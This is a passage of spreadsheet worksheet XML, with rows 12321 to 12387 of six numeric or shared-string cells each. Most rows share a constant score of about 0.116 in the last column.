    <row r="12321" ht="15.75" customHeight="1">
      <c r="A12321" s="1">
        <v>2691.0</v>
      </c>
      <c r="B12321" s="2">
        <v>3.4826388E7</v>
      </c>
      <c r="C12321" s="2" t="s">
        <v>11838</v>
      </c>
      <c r="D12321" s="2">
        <v>1.0</v>
      </c>
      <c r="E12321" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12321" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12322" ht="15.75" customHeight="1">
      <c r="A12322" s="1">
        <v>2825.0</v>
      </c>
      <c r="B12322" s="2">
        <v>3.5395837E7</v>
      </c>
      <c r="C12322" s="5" t="s">
        <v>11839</v>
      </c>
      <c r="D12322" s="2">
        <v>1.0</v>
      </c>
      <c r="E12322" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12322" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12323" ht="15.75" customHeight="1">
      <c r="A12323" s="1">
        <v>2843.0</v>
      </c>
      <c r="B12323" s="2">
        <v>3.5452072E7</v>
      </c>
      <c r="C12323" s="2" t="s">
        <v>11840</v>
      </c>
      <c r="D12323" s="2">
        <v>1.0</v>
      </c>
      <c r="E12323" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12323" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12324" ht="15.75" customHeight="1">
      <c r="A12324" s="1">
        <v>3393.0</v>
      </c>
      <c r="B12324" s="2">
        <v>3.7984663E7</v>
      </c>
      <c r="C12324" s="2" t="s">
        <v>11841</v>
      </c>
      <c r="D12324" s="2">
        <v>1.0</v>
      </c>
      <c r="E12324" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12324" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12325" ht="15.75" customHeight="1">
      <c r="A12325" s="1">
        <v>3481.0</v>
      </c>
      <c r="B12325" s="2">
        <v>3.8404361E7</v>
      </c>
      <c r="C12325" s="2" t="s">
        <v>11842</v>
      </c>
      <c r="D12325" s="2">
        <v>1.0</v>
      </c>
      <c r="E12325" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12325" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12326" ht="15.75" customHeight="1">
      <c r="A12326" s="1">
        <v>4092.0</v>
      </c>
      <c r="B12326" s="2">
        <v>4.1253333E7</v>
      </c>
      <c r="C12326" s="2" t="s">
        <v>11843</v>
      </c>
      <c r="D12326" s="2">
        <v>1.0</v>
      </c>
      <c r="E12326" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12326" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12327" ht="15.75" customHeight="1">
      <c r="A12327" s="1">
        <v>4182.0</v>
      </c>
      <c r="B12327" s="2">
        <v>4.1565874E7</v>
      </c>
      <c r="C12327" s="2" t="s">
        <v>11844</v>
      </c>
      <c r="D12327" s="2">
        <v>1.0</v>
      </c>
      <c r="E12327" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12327" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12328" ht="15.75" customHeight="1">
      <c r="A12328" s="1">
        <v>4603.0</v>
      </c>
      <c r="B12328" s="2">
        <v>4.2832269E7</v>
      </c>
      <c r="C12328" s="2" t="s">
        <v>11845</v>
      </c>
      <c r="D12328" s="2">
        <v>1.0</v>
      </c>
      <c r="E12328" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12328" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12329" ht="15.75" customHeight="1">
      <c r="A12329" s="1">
        <v>4636.0</v>
      </c>
      <c r="B12329" s="2">
        <v>4.3008433E7</v>
      </c>
      <c r="C12329" s="2" t="s">
        <v>11846</v>
      </c>
      <c r="D12329" s="2">
        <v>1.0</v>
      </c>
      <c r="E12329" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12329" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12330" ht="15.75" customHeight="1">
      <c r="A12330" s="1">
        <v>4703.0</v>
      </c>
      <c r="B12330" s="2">
        <v>4.3251682E7</v>
      </c>
      <c r="C12330" s="2" t="s">
        <v>11847</v>
      </c>
      <c r="D12330" s="2">
        <v>1.0</v>
      </c>
      <c r="E12330" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12330" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12331" ht="15.75" customHeight="1">
      <c r="A12331" s="1">
        <v>4911.0</v>
      </c>
      <c r="B12331" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C12331" s="2" t="s">
        <v>11848</v>
      </c>
      <c r="D12331" s="2">
        <v>1.0</v>
      </c>
      <c r="E12331" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12331" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12332" ht="15.75" customHeight="1">
      <c r="A12332" s="1">
        <v>5212.0</v>
      </c>
      <c r="B12332" s="2">
        <v>4.4939523E7</v>
      </c>
      <c r="C12332" s="2" t="s">
        <v>11849</v>
      </c>
      <c r="D12332" s="2">
        <v>1.0</v>
      </c>
      <c r="E12332" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12332" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12333" ht="15.75" customHeight="1">
      <c r="A12333" s="1">
        <v>5476.0</v>
      </c>
      <c r="B12333" s="2">
        <v>4.5723623E7</v>
      </c>
      <c r="C12333" s="2" t="s">
        <v>11850</v>
      </c>
      <c r="D12333" s="2">
        <v>1.0</v>
      </c>
      <c r="E12333" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12333" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12334" ht="15.75" customHeight="1">
      <c r="A12334" s="1">
        <v>5530.0</v>
      </c>
      <c r="B12334" s="2">
        <v>4.5880281E7</v>
      </c>
      <c r="C12334" s="2" t="s">
        <v>11851</v>
      </c>
      <c r="D12334" s="2">
        <v>1.0</v>
      </c>
      <c r="E12334" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12334" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12335" ht="15.75" customHeight="1">
      <c r="A12335" s="1">
        <v>5531.0</v>
      </c>
      <c r="B12335" s="2">
        <v>4.5880281E7</v>
      </c>
      <c r="C12335" s="2" t="s">
        <v>11852</v>
      </c>
      <c r="D12335" s="2">
        <v>1.0</v>
      </c>
      <c r="E12335" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12335" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12336" ht="15.75" customHeight="1">
      <c r="A12336" s="1">
        <v>5739.0</v>
      </c>
      <c r="B12336" s="2">
        <v>4.6620294E7</v>
      </c>
      <c r="C12336" s="2" t="s">
        <v>11853</v>
      </c>
      <c r="D12336" s="2">
        <v>1.0</v>
      </c>
      <c r="E12336" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12336" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12337" ht="15.75" customHeight="1">
      <c r="A12337" s="1">
        <v>5773.0</v>
      </c>
      <c r="B12337" s="2">
        <v>4.67161E7</v>
      </c>
      <c r="C12337" s="2" t="s">
        <v>11854</v>
      </c>
      <c r="D12337" s="2">
        <v>1.0</v>
      </c>
      <c r="E12337" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12337" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12338" ht="15.75" customHeight="1">
      <c r="A12338" s="1">
        <v>5842.0</v>
      </c>
      <c r="B12338" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C12338" s="2" t="s">
        <v>11855</v>
      </c>
      <c r="D12338" s="2">
        <v>1.0</v>
      </c>
      <c r="E12338" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12338" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12339" ht="15.75" customHeight="1">
      <c r="A12339" s="1">
        <v>5859.0</v>
      </c>
      <c r="B12339" s="2">
        <v>4.6954391E7</v>
      </c>
      <c r="C12339" s="2" t="s">
        <v>11856</v>
      </c>
      <c r="D12339" s="2">
        <v>1.0</v>
      </c>
      <c r="E12339" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12339" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12340" ht="15.75" customHeight="1">
      <c r="A12340" s="1">
        <v>6046.0</v>
      </c>
      <c r="B12340" s="2">
        <v>4.7603087E7</v>
      </c>
      <c r="C12340" s="2" t="s">
        <v>11857</v>
      </c>
      <c r="D12340" s="2">
        <v>1.0</v>
      </c>
      <c r="E12340" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12340" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12341" ht="15.75" customHeight="1">
      <c r="A12341" s="1">
        <v>6260.0</v>
      </c>
      <c r="B12341" s="2">
        <v>4.8115828E7</v>
      </c>
      <c r="C12341" s="2" t="s">
        <v>11858</v>
      </c>
      <c r="D12341" s="2">
        <v>1.0</v>
      </c>
      <c r="E12341" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12341" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12342" ht="15.75" customHeight="1">
      <c r="A12342" s="1">
        <v>6751.0</v>
      </c>
      <c r="B12342" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C12342" s="2" t="s">
        <v>11859</v>
      </c>
      <c r="D12342" s="2">
        <v>1.0</v>
      </c>
      <c r="E12342" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12342" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12343" ht="15.75" customHeight="1">
      <c r="A12343" s="1">
        <v>6891.0</v>
      </c>
      <c r="B12343" s="2">
        <v>4.978501E7</v>
      </c>
      <c r="C12343" s="2" t="s">
        <v>11860</v>
      </c>
      <c r="D12343" s="2">
        <v>1.0</v>
      </c>
      <c r="E12343" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12343" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12344" ht="15.75" customHeight="1">
      <c r="A12344" s="1">
        <v>7072.0</v>
      </c>
      <c r="B12344" s="2">
        <v>5.0246549E7</v>
      </c>
      <c r="C12344" s="2" t="s">
        <v>11861</v>
      </c>
      <c r="D12344" s="2">
        <v>1.0</v>
      </c>
      <c r="E12344" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12344" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12345" ht="15.75" customHeight="1">
      <c r="A12345" s="1">
        <v>7384.0</v>
      </c>
      <c r="B12345" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C12345" s="2" t="s">
        <v>11862</v>
      </c>
      <c r="D12345" s="2">
        <v>1.0</v>
      </c>
      <c r="E12345" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12345" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12346" ht="15.75" customHeight="1">
      <c r="A12346" s="1">
        <v>7508.0</v>
      </c>
      <c r="B12346" s="2">
        <v>5.1397027E7</v>
      </c>
      <c r="C12346" s="2" t="s">
        <v>11863</v>
      </c>
      <c r="D12346" s="2">
        <v>1.0</v>
      </c>
      <c r="E12346" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12346" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12347" ht="15.75" customHeight="1">
      <c r="A12347" s="1">
        <v>7845.0</v>
      </c>
      <c r="B12347" s="2">
        <v>5.2334225E7</v>
      </c>
      <c r="C12347" s="5" t="s">
        <v>11864</v>
      </c>
      <c r="D12347" s="2">
        <v>1.0</v>
      </c>
      <c r="E12347" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12347" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12348" ht="15.75" customHeight="1">
      <c r="A12348" s="1">
        <v>7904.0</v>
      </c>
      <c r="B12348" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C12348" s="2" t="s">
        <v>11865</v>
      </c>
      <c r="D12348" s="2">
        <v>1.0</v>
      </c>
      <c r="E12348" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12348" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12349" ht="15.75" customHeight="1">
      <c r="A12349" s="1">
        <v>7931.0</v>
      </c>
      <c r="B12349" s="2">
        <v>5.2578727E7</v>
      </c>
      <c r="C12349" s="2" t="s">
        <v>11866</v>
      </c>
      <c r="D12349" s="2">
        <v>1.0</v>
      </c>
      <c r="E12349" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12349" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12350" ht="15.75" customHeight="1">
      <c r="A12350" s="1">
        <v>8720.0</v>
      </c>
      <c r="B12350" s="2">
        <v>5.4490772E7</v>
      </c>
      <c r="C12350" s="2" t="s">
        <v>11867</v>
      </c>
      <c r="D12350" s="2">
        <v>1.0</v>
      </c>
      <c r="E12350" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12350" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12351" ht="15.75" customHeight="1">
      <c r="A12351" s="1">
        <v>8957.0</v>
      </c>
      <c r="B12351" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C12351" s="2" t="s">
        <v>11868</v>
      </c>
      <c r="D12351" s="2">
        <v>1.0</v>
      </c>
      <c r="E12351" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12351" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12352" ht="15.75" customHeight="1">
      <c r="A12352" s="1">
        <v>9828.0</v>
      </c>
      <c r="B12352" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C12352" s="2" t="s">
        <v>11869</v>
      </c>
      <c r="D12352" s="2">
        <v>1.0</v>
      </c>
      <c r="E12352" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12352" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12353" ht="15.75" customHeight="1">
      <c r="A12353" s="1">
        <v>9866.0</v>
      </c>
      <c r="B12353" s="2">
        <v>5.6725053E7</v>
      </c>
      <c r="C12353" s="2" t="s">
        <v>11870</v>
      </c>
      <c r="D12353" s="2">
        <v>1.0</v>
      </c>
      <c r="E12353" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12353" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12354" ht="15.75" customHeight="1">
      <c r="A12354" s="1">
        <v>9884.0</v>
      </c>
      <c r="B12354" s="2">
        <v>5.6750173E7</v>
      </c>
      <c r="C12354" s="2" t="s">
        <v>11871</v>
      </c>
      <c r="D12354" s="2">
        <v>1.0</v>
      </c>
      <c r="E12354" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12354" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12355" ht="15.75" customHeight="1">
      <c r="A12355" s="1">
        <v>10056.0</v>
      </c>
      <c r="B12355" s="2">
        <v>5.7119167E7</v>
      </c>
      <c r="C12355" s="2" t="s">
        <v>11872</v>
      </c>
      <c r="D12355" s="2">
        <v>1.0</v>
      </c>
      <c r="E12355" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12355" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12356" ht="15.75" customHeight="1">
      <c r="A12356" s="1">
        <v>10150.0</v>
      </c>
      <c r="B12356" s="2">
        <v>5.7310323E7</v>
      </c>
      <c r="C12356" s="2" t="s">
        <v>11873</v>
      </c>
      <c r="D12356" s="2">
        <v>1.0</v>
      </c>
      <c r="E12356" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12356" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12357" ht="15.75" customHeight="1">
      <c r="A12357" s="1">
        <v>10178.0</v>
      </c>
      <c r="B12357" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C12357" s="2" t="s">
        <v>11874</v>
      </c>
      <c r="D12357" s="2">
        <v>1.0</v>
      </c>
      <c r="E12357" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12357" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12358" ht="15.75" customHeight="1">
      <c r="A12358" s="1">
        <v>10256.0</v>
      </c>
      <c r="B12358" s="2">
        <v>5.7554924E7</v>
      </c>
      <c r="C12358" s="2" t="s">
        <v>11875</v>
      </c>
      <c r="D12358" s="2">
        <v>1.0</v>
      </c>
      <c r="E12358" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12358" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12359" ht="15.75" customHeight="1">
      <c r="A12359" s="1">
        <v>10344.0</v>
      </c>
      <c r="B12359" s="2">
        <v>5.7732566E7</v>
      </c>
      <c r="C12359" s="2" t="s">
        <v>11876</v>
      </c>
      <c r="D12359" s="2">
        <v>1.0</v>
      </c>
      <c r="E12359" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12359" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12360" ht="15.75" customHeight="1">
      <c r="A12360" s="1">
        <v>11008.0</v>
      </c>
      <c r="B12360" s="2">
        <v>1.7707258E7</v>
      </c>
      <c r="C12360" s="2" t="s">
        <v>11877</v>
      </c>
      <c r="D12360" s="2">
        <v>1.0</v>
      </c>
      <c r="E12360" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12360" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12361" ht="15.75" customHeight="1">
      <c r="A12361" s="1">
        <v>11221.0</v>
      </c>
      <c r="B12361" s="2">
        <v>2.0303155E7</v>
      </c>
      <c r="C12361" s="2" t="s">
        <v>11878</v>
      </c>
      <c r="D12361" s="2">
        <v>1.0</v>
      </c>
      <c r="E12361" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12361" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12362" ht="15.75" customHeight="1">
      <c r="A12362" s="1">
        <v>11615.0</v>
      </c>
      <c r="B12362" s="2">
        <v>2.3059924E7</v>
      </c>
      <c r="C12362" s="2" t="s">
        <v>11879</v>
      </c>
      <c r="D12362" s="2">
        <v>1.0</v>
      </c>
      <c r="E12362" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12362" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12363" ht="15.75" customHeight="1">
      <c r="A12363" s="1">
        <v>13353.0</v>
      </c>
      <c r="B12363" s="2">
        <v>3.4734762E7</v>
      </c>
      <c r="C12363" s="2" t="s">
        <v>11880</v>
      </c>
      <c r="D12363" s="2">
        <v>1.0</v>
      </c>
      <c r="E12363" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12363" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12364" ht="15.75" customHeight="1">
      <c r="A12364" s="1">
        <v>13697.0</v>
      </c>
      <c r="B12364" s="2">
        <v>3.6153028E7</v>
      </c>
      <c r="C12364" s="2" t="s">
        <v>11881</v>
      </c>
      <c r="D12364" s="2">
        <v>1.0</v>
      </c>
      <c r="E12364" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12364" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12365" ht="15.75" customHeight="1">
      <c r="A12365" s="1">
        <v>14401.0</v>
      </c>
      <c r="B12365" s="2">
        <v>3.9185523E7</v>
      </c>
      <c r="C12365" s="2" t="s">
        <v>11882</v>
      </c>
      <c r="D12365" s="2">
        <v>1.0</v>
      </c>
      <c r="E12365" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12365" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12366" ht="15.75" customHeight="1">
      <c r="A12366" s="1">
        <v>14867.0</v>
      </c>
      <c r="B12366" s="2">
        <v>4.1076296E7</v>
      </c>
      <c r="C12366" s="2" t="s">
        <v>11883</v>
      </c>
      <c r="D12366" s="2">
        <v>1.0</v>
      </c>
      <c r="E12366" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12366" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12367" ht="15.75" customHeight="1">
      <c r="A12367" s="1">
        <v>14966.0</v>
      </c>
      <c r="B12367" s="2">
        <v>4.1341481E7</v>
      </c>
      <c r="C12367" s="2" t="s">
        <v>11884</v>
      </c>
      <c r="D12367" s="2">
        <v>1.0</v>
      </c>
      <c r="E12367" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12367" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12368" ht="15.75" customHeight="1">
      <c r="A12368" s="1">
        <v>15384.0</v>
      </c>
      <c r="B12368" s="2">
        <v>4.2776495E7</v>
      </c>
      <c r="C12368" s="2" t="s">
        <v>11885</v>
      </c>
      <c r="D12368" s="2">
        <v>1.0</v>
      </c>
      <c r="E12368" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12368" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12369" ht="15.75" customHeight="1">
      <c r="A12369" s="1">
        <v>15810.0</v>
      </c>
      <c r="B12369" s="2">
        <v>4.424972E7</v>
      </c>
      <c r="C12369" s="2" t="s">
        <v>11886</v>
      </c>
      <c r="D12369" s="2">
        <v>1.0</v>
      </c>
      <c r="E12369" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12369" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12370" ht="15.75" customHeight="1">
      <c r="A12370" s="1">
        <v>16521.0</v>
      </c>
      <c r="B12370" s="2">
        <v>4.6645475E7</v>
      </c>
      <c r="C12370" s="2" t="s">
        <v>11887</v>
      </c>
      <c r="D12370" s="2">
        <v>1.0</v>
      </c>
      <c r="E12370" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12370" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12371" ht="15.75" customHeight="1">
      <c r="A12371" s="1">
        <v>17175.0</v>
      </c>
      <c r="B12371" s="2">
        <v>4.8892799E7</v>
      </c>
      <c r="C12371" s="2" t="s">
        <v>11888</v>
      </c>
      <c r="D12371" s="2">
        <v>1.0</v>
      </c>
      <c r="E12371" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12371" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12372" ht="15.75" customHeight="1">
      <c r="A12372" s="1">
        <v>17268.0</v>
      </c>
      <c r="B12372" s="2">
        <v>4.9163201E7</v>
      </c>
      <c r="C12372" s="2" t="s">
        <v>11889</v>
      </c>
      <c r="D12372" s="2">
        <v>1.0</v>
      </c>
      <c r="E12372" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12372" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12373" ht="15.75" customHeight="1">
      <c r="A12373" s="1">
        <v>17930.0</v>
      </c>
      <c r="B12373" s="2">
        <v>5.120303E7</v>
      </c>
      <c r="C12373" s="2" t="s">
        <v>11890</v>
      </c>
      <c r="D12373" s="2">
        <v>1.0</v>
      </c>
      <c r="E12373" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12373" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12374" ht="15.75" customHeight="1">
      <c r="A12374" s="1">
        <v>17996.0</v>
      </c>
      <c r="B12374" s="2">
        <v>5.1400735E7</v>
      </c>
      <c r="C12374" s="2" t="s">
        <v>11891</v>
      </c>
      <c r="D12374" s="2">
        <v>1.0</v>
      </c>
      <c r="E12374" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12374" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12375" ht="15.75" customHeight="1">
      <c r="A12375" s="1">
        <v>18275.0</v>
      </c>
      <c r="B12375" s="2">
        <v>5.2225363E7</v>
      </c>
      <c r="C12375" s="2" t="s">
        <v>11892</v>
      </c>
      <c r="D12375" s="2">
        <v>1.0</v>
      </c>
      <c r="E12375" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12375" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12376" ht="15.75" customHeight="1">
      <c r="A12376" s="1">
        <v>18610.0</v>
      </c>
      <c r="B12376" s="2">
        <v>5.3334488E7</v>
      </c>
      <c r="C12376" s="2" t="s">
        <v>11893</v>
      </c>
      <c r="D12376" s="2">
        <v>1.0</v>
      </c>
      <c r="E12376" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12376" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12377" ht="15.75" customHeight="1">
      <c r="A12377" s="1">
        <v>18749.0</v>
      </c>
      <c r="B12377" s="2">
        <v>5.377498E7</v>
      </c>
      <c r="C12377" s="2" t="s">
        <v>11894</v>
      </c>
      <c r="D12377" s="2">
        <v>1.0</v>
      </c>
      <c r="E12377" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12377" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12378" ht="15.75" customHeight="1">
      <c r="A12378" s="1">
        <v>18902.0</v>
      </c>
      <c r="B12378" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C12378" s="2" t="s">
        <v>11895</v>
      </c>
      <c r="D12378" s="2">
        <v>1.0</v>
      </c>
      <c r="E12378" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12378" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12379" ht="15.75" customHeight="1">
      <c r="A12379" s="1">
        <v>19133.0</v>
      </c>
      <c r="B12379" s="2">
        <v>5.4785372E7</v>
      </c>
      <c r="C12379" s="2" t="s">
        <v>11896</v>
      </c>
      <c r="D12379" s="2">
        <v>1.0</v>
      </c>
      <c r="E12379" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12379" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12380" ht="15.75" customHeight="1">
      <c r="A12380" s="1">
        <v>19289.0</v>
      </c>
      <c r="B12380" s="2">
        <v>5.5178863E7</v>
      </c>
      <c r="C12380" s="2" t="s">
        <v>11897</v>
      </c>
      <c r="D12380" s="2">
        <v>1.0</v>
      </c>
      <c r="E12380" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12380" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12381" ht="15.75" customHeight="1">
      <c r="A12381" s="1">
        <v>19507.0</v>
      </c>
      <c r="B12381" s="2">
        <v>5.5927641E7</v>
      </c>
      <c r="C12381" s="2" t="s">
        <v>11898</v>
      </c>
      <c r="D12381" s="2">
        <v>1.0</v>
      </c>
      <c r="E12381" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12381" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12382" ht="15.75" customHeight="1">
      <c r="A12382" s="1">
        <v>19872.0</v>
      </c>
      <c r="B12382" s="2">
        <v>5.7246276E7</v>
      </c>
      <c r="C12382" s="2" t="s">
        <v>11899</v>
      </c>
      <c r="D12382" s="2">
        <v>1.0</v>
      </c>
      <c r="E12382" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12382" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12383" ht="15.75" customHeight="1">
      <c r="A12383" s="1">
        <v>20000.0</v>
      </c>
      <c r="B12383" s="2">
        <v>5.7713735E7</v>
      </c>
      <c r="C12383" s="2" t="s">
        <v>11900</v>
      </c>
      <c r="D12383" s="2">
        <v>1.0</v>
      </c>
      <c r="E12383" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12383" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12384" ht="15.75" customHeight="1">
      <c r="A12384" s="1">
        <v>20440.0</v>
      </c>
      <c r="B12384" s="2">
        <v>1.2415673E7</v>
      </c>
      <c r="C12384" s="2" t="s">
        <v>11901</v>
      </c>
      <c r="D12384" s="2">
        <v>1.0</v>
      </c>
      <c r="E12384" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12384" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12385" ht="15.75" customHeight="1">
      <c r="A12385" s="1">
        <v>20924.0</v>
      </c>
      <c r="B12385" s="2">
        <v>1.6393808E7</v>
      </c>
      <c r="C12385" s="2" t="s">
        <v>11902</v>
      </c>
      <c r="D12385" s="2">
        <v>1.0</v>
      </c>
      <c r="E12385" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12385" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12386" ht="15.75" customHeight="1">
      <c r="A12386" s="1">
        <v>22101.0</v>
      </c>
      <c r="B12386" s="2">
        <v>3.0834654E7</v>
      </c>
      <c r="C12386" s="2" t="s">
        <v>11903</v>
      </c>
      <c r="D12386" s="2">
        <v>1.0</v>
      </c>
      <c r="E12386" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12386" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12387" ht="15.75" customHeight="1">
      <c r="A12387" s="1">
        <v>22351.0</v>
      </c>
      <c r="B12387" s="2">
        <v>3.4561651E7</v>
      </c>
      <c r="C12387" s="2" t="s">
        <v>11904</v>
      </c>
      <c r="D12387" s="2">
        <v>1.0</v>
      </c>
      <c r="E12387" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12387" s="2">
        <v>0.1163522012578616</v>
      </c>
